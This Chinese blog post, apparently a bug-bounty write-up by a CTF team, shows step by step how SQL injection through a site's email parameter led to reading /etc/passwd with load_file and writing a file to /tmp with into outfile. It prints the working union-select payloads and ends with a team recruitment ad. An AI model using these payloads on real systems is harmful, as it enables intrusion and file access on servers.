通过注入文件和外出文件进行SQL注入

  • A+
所属分类:安全文章

01


照常在网上注册为会员

通过注入文件和外出文件进行SQL注入

02



然后重定向到POST,将所有表单信息都发送到

https://www.blablabla.com/svc/*****/form_affiliate。

选择它并发送到转发器。易受攻击的参数是email


通过注入文件和外出文件进行SQL注入

03



在请求框中,在“ email ”参数“ ”中输入此SQL命令,

and 1=2unionallselectconcat_ws(0x3a,version(),user(),database())

然后单击Go(此命令将显示版本,用户和数据库名称)

通过注入文件和外出文件进行SQL注入

04



结果显示在响应框,

“ 5.5.41-logroot@10.130。*。**:tp_cart ”上。

现在,尝试使用此加载文件命令 

and 1=2 union all select load_file(‘/etc/passwd’)
通过注入文件和外出文件进行SQL注入


05



将load file命令更改为outfile命令,在/ tmp '上创建一个文件

‘and1=2unionallselect'blablabla_bug_bounty_program'intooutfile'/tmp/blablabla'

该命令将blablabla_bug_bounty_program写入/ tmp目录中的blablabla文件中。

通过注入文件和外出文件进行SQL注入


06



现在,再次使用加载文件来查看文件是否已创建,并且未使用此命令

and 1=2 union all select load_file(‘/tmp/blablabla’)


通过注入文件和外出文件进行SQL注入

并且创建成功!所以我得到了sql,并且还可以在服务器上创建文件。

00

Tip

你是否想要加入一个安全团队
拥有更好的学习氛围?

那就加入EDI安全(CTF小组),这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心。

我们诚招web,misc,re,pwn,crypto各个方向的师傅们,不论年龄、不论性别,EDI为大家提供一个共同学习,一同进步的平台。

我们在挖掘,不让你埋没!

你的加入可以给我们带来新的活力,我们同样也可以赠你无限的发展空间。

有意向的师傅请联系我们的无剧师傅(带上自己的简历,简历内容包括自己的学习方向,学习经历等)。

通过注入文件和外出文件进行SQL注入

EDI安全

通过注入文件和外出文件进行SQL注入

扫二维码|关注我们

一个专注渗透实战经验分享的公众号


本文始发于微信公众号(EDI安全):通过注入文件和外出文件进行SQL注入

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: